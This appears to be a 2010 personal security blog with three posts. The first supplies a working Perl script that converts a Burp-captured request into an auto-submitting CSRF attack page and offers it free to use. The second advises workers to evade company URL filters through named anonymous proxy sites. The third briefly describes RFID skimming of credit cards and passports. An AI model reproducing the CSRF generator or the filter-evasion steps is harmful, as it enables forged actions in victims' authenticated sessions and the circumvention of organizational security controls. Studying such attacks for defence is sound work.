December 30, 2010

Parser for CSRF

It's so easy to implement a CSRF attack, However writing the attack in an HTML code might be endless process.
Therefore I developed a short Perl script which parses a request data into a CSRF request (almost the same).

What do you need in order to run the script:
1. Prel (obviously)
2. Burp Proxy - The attacker should intercept the request. and then copy all data to notepad. See example below:


My script pulls the data from the file "d:\csrf.txt", however it might be changed. The output is same with "html" extension.
See the source code of the script.


open(INF, '<d:\\csrf.txt') or die "error while opening the input file\n";
open(OUTF, '>d:\\csrf.html') or die "error while creatint the output file\n";
@arrin=<INF>;
@arrour=<OUTF>;
print "Script by Nir Valtman";
print "Enter the URL:";
$q=<STDIN>;
print OUTF "<html xmlns=\"http://www.w3.org/1999/xhtml\" >
<head>
<title>CSRF attack</title>
</head>
<body>
<form name=\"badform\" method=\"post\" action=\"$q\"> \n";
foreach $obj (@arrin)
{
chomp($obj);
@spltval=split('\t',$obj);
if ($spltval[0] eq "body")
{
print OUTF "<input type=\"hidden\" name=\"$spltval[1]\"  value=\"$spltval[2]\" />\n";
}
}
print OUTF "<script type=\"text/javascript\">
document.badform.submit();
</script>
</body>
</html>";
print "Done!";


The script is free to use - just give me credits.

December 10, 2010

Bypass Company's URL Filtering

Lots of organizations adding URL filters in order to block people from surfing in unwanted websites, i.e - facebook, linkedin, gmail, hotmail, youtube etc.

In order to bypass these filters (at least worth to try), a worker may surf through an anonymous proxy. I like to work with CyberGhost or TOR, but if you are restricted from installing applications on company's PC - go to http://www.roxprox.com/
If it won't work, You can find more proxies in the following link: http://www.proxy4free.com/page1.html

Short PoC:
By surfing without proxy I can see my real IP address:

After connecting the same website through the proxy above, my IP has changed:
Note - The URL has changed to proxy's web site and the domain "myipaddress.com" is encrypted. 


Important, all data can be decrypted by proxies. I guess that you understand the risks.

Electronic Pickpocket

Do you remember the hustle that people could do (and still can) in order to steal your credit card data? I'll remind you. All credit card's sensitive data is stored on a magnetic stripe and on a chip. 
It has been discovered that the magnetic stripe can be stolen by using magnetic reader. Do you think that the same data on the chip is secure? Think again... 
The chip which is embedded in the credit cards my be stolen via RFID reader. Moreover, not only credit card's data can be stolen, but also any device that holds information that RFID can read, e.g - US Passports.

Attached is the video from the website http://www.wreg.com: